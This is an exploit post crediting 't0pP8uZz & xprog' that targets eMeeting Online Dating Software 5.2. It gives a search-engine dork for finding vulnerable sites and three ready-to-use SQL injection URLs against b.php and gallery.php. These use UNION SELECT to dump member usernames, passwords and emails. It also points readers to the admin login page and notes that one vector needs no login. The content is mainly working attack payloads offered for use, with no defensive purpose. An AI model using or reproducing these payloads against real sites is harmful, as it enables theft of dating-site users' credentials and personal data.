--==+================================================================================+==-- --==+ eMeeting Online Dating Software 5.2 SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SITE: eMeeting Online Dating Software DORK: allintext:"Home Member Search Chat Room Forum Help/Support privacy policy" DESCRIPTION: b.php and gallery.php ID among others on this script are SQL injectable. EXPLOITS: http://www.site.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/* http://www.site.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/**/where/**/username=0x61646D696E/* http://www.site.com/account/gallery.php?p=gal&id=-1/**/UNION/**/ALL/**/SELECT/**/null,null,null,concat(0x273e3c2f74643e,username,0x3a,password,0x3a,email,0x3c62723e3c2f2f),null,null/**/from/**/members/* NOTE: Doesnt look like admin user/password is stored in database, probably in the config. =/ Unless they made a user account with the same user/pass, the admin login is in /newadmin/login.php if you want to try. b.php only returns one row of data, but login not required. gallery.php can return many rows but login is required. GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net ! --==+================================================================================+==-- --==+ eMeeting Online Dating Software 5.2 SQL Injection Vulnerbilitys +==-- --==+================================================================================+==--